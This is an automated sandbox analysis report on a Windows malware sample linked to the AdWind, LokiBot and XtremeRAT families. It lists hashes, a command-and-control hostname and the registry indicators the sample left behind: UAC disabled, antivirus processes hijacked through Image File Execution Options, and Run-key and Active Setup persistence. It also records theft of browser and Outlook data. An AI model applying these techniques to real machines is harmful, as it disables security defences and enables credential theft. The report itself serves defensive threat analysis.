adwind | 18f99597514fed8f0218a32736d142c5038fd9a711a47c6aceb8b8ed39eae6dc

Resubmissions

21-06-2024 17:31

240621-v3p7esydnh 10

14-06-2024 18:11

240614-wszhsa1eje 10

Analysis

max time kernel
724s
max time network
726s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
21-06-2024 17:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ab1286fa7650738e0b821bebf04ade41_JaffaCakes118.exe
Size

4.8MB
MD5

ab1286fa7650738e0b821bebf04ade41
SHA1

3f839fa95db110d547592d1f8bd1ef359a9da4df
SHA256

18f99597514fed8f0218a32736d142c5038fd9a711a47c6aceb8b8ed39eae6dc
SHA512

db9a52c0634c1c32e4d2f99a75b703789e0f28de7a1095b660b03e70c780d34d96549aca51d982813fb18032b24edacb00609db3c7d1b58c09537c12b290fc3b
SSDEEP

24576:Vo2Yq+JFAA6MOrm/KPO/lYq0L0YPLU8OpRZvZLbU4lL525r2zjWYu7XZTj5Ilzrb:V6fyFq7vuINqd7M99/L

Score

10^/10

adwind lokibot xtremerat collection discovery evasion persistence rat spyware stealer trojan upx

Malware Config

Extracted

Family

xtremerat

iaficasioo.zapto.org

Signatures

AdWind
A Java-based RAT family operated as malware-as-a-service.
trojan adwind

Class file contains resources related to AdWind 1 IoCs

resource	yara_rule
sample	family_adwind5

Detect XtremeRAT payload 10 IoCs

resource	yara_rule
behavioral2/files/0x00090000000235e7-15.dat	family_xtremerat
behavioral2/memory/4208-77-0x0000000000C80000-0x0000000000D1A000-memory.dmp	family_xtremerat
behavioral2/memory/4208-83-0x0000000000C80000-0x0000000000D1A000-memory.dmp	family_xtremerat
behavioral2/memory/468-114-0x0000000000C80000-0x0000000000D1A000-memory.dmp	family_xtremerat
behavioral2/memory/468-115-0x0000000000C80000-0x0000000000D1A000-memory.dmp	family_xtremerat
behavioral2/memory/1152-370-0x0000000000C80000-0x0000000000D1A000-memory.dmp	family_xtremerat
behavioral2/memory/1152-371-0x0000000000C80000-0x0000000000D1A000-memory.dmp	family_xtremerat
behavioral2/memory/2952-569-0x0000000000C80000-0x0000000000D1A000-memory.dmp	family_xtremerat
behavioral2/memory/2952-661-0x0000000000C80000-0x0000000000D1A000-memory.dmp	family_xtremerat
behavioral2/memory/3628-1134-0x0000000000C80000-0x0000000000D1A000-memory.dmp	family_xtremerat

Lokibot
Lokibot is a Password and CryptoCoin Wallet Stealer.
trojan spyware stealer lokibot

UAC bypass 3 TTPs 16 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	regedit.exe

XtremeRAT
The XtremeRAT was developed by xtremecoder and has been available since at least 2010, and written in Delphi.
persistence spyware rat xtremerat

Boot or Logon Autostart Execution: Active Setup 2 TTPs 2 IoCs

Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

persistence

Active Setup

T1547.014

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Active Setup\Installed Components\{MX485B56-3D72-02VO-K1CG-O24F6QN078E0}	server.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{MX485B56-3D72-02VO-K1CG-O24F6QN078E0}\StubPath = "C:\\Windows\\InstallDir\\Server.exe restart"	server.exe

Disables Task Manager via registry modification
evasion
Disables use of System Restore points 1 TTPs
evasion

Inhibit System Recovery
T1490

Event Triggered Execution: Image File Execution Options Injection 1 TTPs 64 IoCs

persistence

Image File Execution Options Injection

T1546.012

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\K7TSMngr.exe	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\uiWatchDog.exe\debugger = "svchost.exe"	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\V3Main.exe	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UnThreat.exe\debugger = "svchost.exe"	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe\debugger = "svchost.exe"	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nanosvc.exe\debugger = "svchost.exe"	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVK.exe	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\uiSeAgnt.exe	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fssm32.exe\debugger = "svchost.exe"	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\acs.exe\debugger = "svchost.exe"	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SASCore64.exe	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BavWebClient.exe	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FilMsg.exe\debugger = "svchost.exe"	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SCANNER.EXE\debugger = "svchost.exe"	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\njeeves2.exe\debugger = "svchost.exe"	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tshark.exe\debugger = "svchost.exe"	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MWASER.EXE\debugger = "svchost.exe"	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\K7SysMon.Exe	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SCANWSCS.EXE\debugger = "svchost.exe"	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SDTray.exe	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cis.exe	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\twssrv.exe	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SASTask.exe	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\editcap.exe\debugger = "svchost.exe"	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WebCompanion.exe\debugger = "svchost.exe"	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\K7FWSrvc.exe	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\quamgr.exe\debugger = "svchost.exe"	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PSANHost.exe	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FilUp.exe	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FortiSSLVPNdaemon.exe\debugger = "svchost.exe"	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\OPSSVC.EXE\debugger = "svchost.exe"	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mbamscheduler.exe\debugger = "svchost.exe"	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\V3Proxy.exe	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\coreFrameworkHost.exe	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FortiClient_Diagnostic_Tool.exe\debugger = "svchost.exe"	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AgentSvc.exe	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AdAwareDesktop.exe	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SCANWSCS.EXE	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MCShieldRTM.exe	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TRAYICOS.EXE	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fshoster32.exe\debugger = "svchost.exe"	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\guardxservice.exe\debugger = "svchost.exe"	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BavUpdater.exe\debugger = "svchost.exe"	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FilMsg.exe\debugger = "svchost.exe"	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mergecap.exe\debugger = "svchost.exe"	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\econceal.exe	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BDSSVC.EXE	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fcappdb.exe	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CONSCTLX.EXE\debugger = "svchost.exe"	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FSM32.EXE\debugger = "svchost.exe"	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\guardxkickoff_x64.exe	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MCShieldDS.exe	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FortiFW.exe\debugger = "svchost.exe"	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cis.exe	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\virusutilities.exe	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GDKBFltExe32.exe	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SDWelcome.exe\debugger = "svchost.exe"	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\twssrv.exe	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AdAwareTray.exe	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nseupdatesvc.exe\debugger = "svchost.exe"	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\uiSeAgnt.exe\debugger = "svchost.exe"	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fshoster32.exe\debugger = "svchost.exe"	regedit.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	ab1286fa7650738e0b821bebf04ade41_JaffaCakes118.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	server.exe

Executes dropped EXE 18 IoCs

pid	Process
3628	server.exe
1616	307omiof.exe
4372	javaw.exe
2788	java.exe
6100	307omiof.exe
4568	server.exe
3820	javaw.exe
3556	java.exe
3340	javaw.exe
6616	java.exe
6400	javaw.exe
6404	javaw.exe
5852	javaw.exe
1768	javaw.exe
1168	javaw.exe
5284	javaw.exe
4844	javaw.exe
1536	javaw.exe

Loads dropped DLL 64 IoCs

pid	Process
4372	javaw.exe
4372	javaw.exe
4372	javaw.exe
4372	javaw.exe
4372	javaw.exe
4372	javaw.exe
4372	javaw.exe
4372	javaw.exe
4372	javaw.exe
2788	java.exe
2788	java.exe
2788	java.exe
2788	java.exe
2788	java.exe
2788	java.exe
2788	java.exe
4372	javaw.exe
2788	java.exe
4372	javaw.exe
2788	java.exe
2788	java.exe
2788	java.exe
4372	javaw.exe
2788	java.exe
3820	javaw.exe
3820	javaw.exe
3820	javaw.exe
3820	javaw.exe
3820	javaw.exe
3820	javaw.exe
3820	javaw.exe
3820	javaw.exe
3820	javaw.exe
3556	java.exe
3556	java.exe
3556	java.exe
3556	java.exe
3820	javaw.exe
3556	java.exe
3556	java.exe
3556	java.exe
3820	javaw.exe
3556	java.exe
3556	java.exe
3556	java.exe
3556	java.exe
3820	javaw.exe
3556	java.exe
3340	javaw.exe
3340	javaw.exe
3340	javaw.exe
3340	javaw.exe
3340	javaw.exe
3340	javaw.exe
3340	javaw.exe
3340	javaw.exe
3340	javaw.exe
6616	java.exe
6616	java.exe
6616	java.exe
6616	java.exe
6616	java.exe
6616	java.exe
6616	java.exe

Modifies file permissions 1 TTPs 1 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
2560	icacls.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 3 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0007000000023732-990.dat	upx
behavioral2/memory/1616-995-0x0000000000400000-0x000000000054D000-memory.dmp	upx
behavioral2/memory/1616-1285-0x0000000000400000-0x000000000054D000-memory.dmp	upx

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook	307omiof.exe
Key opened	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	307omiof.exe
Key opened	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	307omiof.exe

Adds Run key to start application 2 TTPs 15 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sVCHXnbVdLZ = "\"C:\\Users\\Admin\\AppData\\Roaming\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\JbWWIoBadTZ\\lHhuTzdHfZG.ZDwmik\""	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sVCHXnbVdLZ = "\"C:\\Users\\Admin\\AppData\\Roaming\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\JbWWIoBadTZ\\lHhuTzdHfZG.ZDwmik\""	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sVCHXnbVdLZ = "\"C:\\Users\\Admin\\AppData\\Roaming\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\JbWWIoBadTZ\\lHhuTzdHfZG.ZDwmik\""	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\307omiof.exe = "C:\\Users\\Admin\\AppData\\Roaming/Microsoft/Skype.exe"	307omiof.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sVCHXnbVdLZ = "\"C:\\Users\\Admin\\AppData\\Roaming\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\JbWWIoBadTZ\\lHhuTzdHfZG.ZDwmik\""	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sVCHXnbVdLZ = "\"C:\\Users\\Admin\\AppData\\Roaming\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\JbWWIoBadTZ\\lHhuTzdHfZG.ZDwmik\""	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sVCHXnbVdLZ = "\"C:\\Users\\Admin\\AppData\\Roaming\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\JbWWIoBadTZ\\lHhuTzdHfZG.ZDwmik\""	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sVCHXnbVdLZ = "\"C:\\Users\\Admin\\AppData\\Roaming\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\JbWWIoBadTZ\\lHhuTzdHfZG.ZDwmik\""	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sVCHXnbVdLZ = "\"C:\\Users\\Admin\\AppData\\Roaming\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\JbWWIoBadTZ\\lHhuTzdHfZG.ZDwmik\""	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HKCU = "C:\\Windows\\InstallDir\\Server.exe"	server.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sVCHXnbVdLZ = "\"C:\\Users\\Admin\\AppData\\Roaming\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\JbWWIoBadTZ\\lHhuTzdHfZG.ZDwmik\""	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sVCHXnbVdLZ = "\"C:\\Users\\Admin\\AppData\\Roaming\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\JbWWIoBadTZ\\lHhuTzdHfZG.ZDwmik\""	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sVCHXnbVdLZ = "\"C:\\Users\\Admin\\AppData\\Roaming\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\JbWWIoBadTZ\\lHhuTzdHfZG.ZDwmik\""	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ab1286fa7650738e0b821bebf04ade41_JaffaCakes118.exe = "C:\\Users\\Admin\\AppData\\Roaming/Microsoft/Skype.exe"	ab1286fa7650738e0b821bebf04ade41_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\HKLM = "C:\\Windows\\InstallDir\\Server.exe"	server.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 1 IoCs

Web Service

T1102

flow	ioc
227	bitbucket.org

Drops file in System32 directory 31 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.chk	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.dat	svchost.exe
File opened for modification	C:\Windows\System32\test.txt	java.exe
File opened for modification	C:\Windows\System32\test.txt	java.exe
File created	C:\Windows\System32\test.txt	javaw.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.jtx	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.jfm	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.jcp	svchost.exe
File opened for modification	C:\Windows\System32\test.txt	java.exe
File opened for modification	C:\Windows\System32\test.txt	javaw.exe
File opened for modification	C:\Windows\System32\test.txt	javaw.exe
File opened for modification	C:\Windows\System32\test.txt	javaw.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.chk	svchost.exe
File opened for modification	C:\Windows\System32\test.txt	javaw.exe
File opened for modification	C:\Windows\System32\test.txt	java.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.dat	svchost.exe
File opened for modification	C:\Windows\System32\test.txt	javaw.exe
File opened for modification	C:\Windows\System32\test.txt	javaw.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.log	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSSres00001.jrs	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSSres00002.jrs	svchost.exe
File opened for modification	C:\Windows\System32\test.txt	javaw.exe
File opened for modification	C:\Windows\System32\test.txt	javaw.exe
File opened for modification	C:\Windows\System32\test.txt	javaw.exe
File opened for modification	C:\Windows\System32\test.txt	javaw.exe
File opened for modification	C:\Windows\System32\test.txt	javaw.exe
File opened for modification	C:\Windows\System32\test.txt	java.exe
File opened for modification	C:\Windows\System32\test.txt	javaw.exe
File opened for modification	C:\Windows\System32\test.txt	javaw.exe
File opened for modification	C:\Windows\System32\test.txt	java.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSStmp.log	svchost.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 4956 set thread context of 2196	4956	ab1286fa7650738e0b821bebf04ade41_JaffaCakes118.exe	97
PID 1616 set thread context of 6100	1616	307omiof.exe	239

Drops file in Windows directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\InstallDir\Server.exe	server.exe
File created	C:\Windows\InstallDir\Server.exe	server.exe
File opened for modification	C:\Windows\InstallDir\	server.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Kills process with taskkill 64 IoCs

evasion

pid	Process
6340	taskkill.exe
7008	taskkill.exe
5644	taskkill.exe
6588	taskkill.exe
1964	taskkill.exe
6612	taskkill.exe
1768	taskkill.exe
7128	taskkill.exe
1052	taskkill.exe
1788	taskkill.exe
3216	taskkill.exe
6792	taskkill.exe
6780	taskkill.exe
6720	taskkill.exe
6172	taskkill.exe
5560	taskkill.exe
2232	taskkill.exe
7084	taskkill.exe
6564	taskkill.exe
6708	taskkill.exe
1592	taskkill.exe
7024	taskkill.exe
7004	taskkill.exe
6328	taskkill.exe
6208	taskkill.exe
6688	taskkill.exe
7064	taskkill.exe
2840	taskkill.exe
180	taskkill.exe
5668	taskkill.exe
7140	taskkill.exe
3104	taskkill.exe
2228	taskkill.exe
5284	taskkill.exe
5100	taskkill.exe
6980	taskkill.exe
6748	taskkill.exe
6484	taskkill.exe
1276	taskkill.exe
5056	taskkill.exe
4236	taskkill.exe
6708	taskkill.exe
4480	taskkill.exe
6020	taskkill.exe
6888	taskkill.exe
7040	taskkill.exe
964	taskkill.exe
5124	taskkill.exe
7124	taskkill.exe
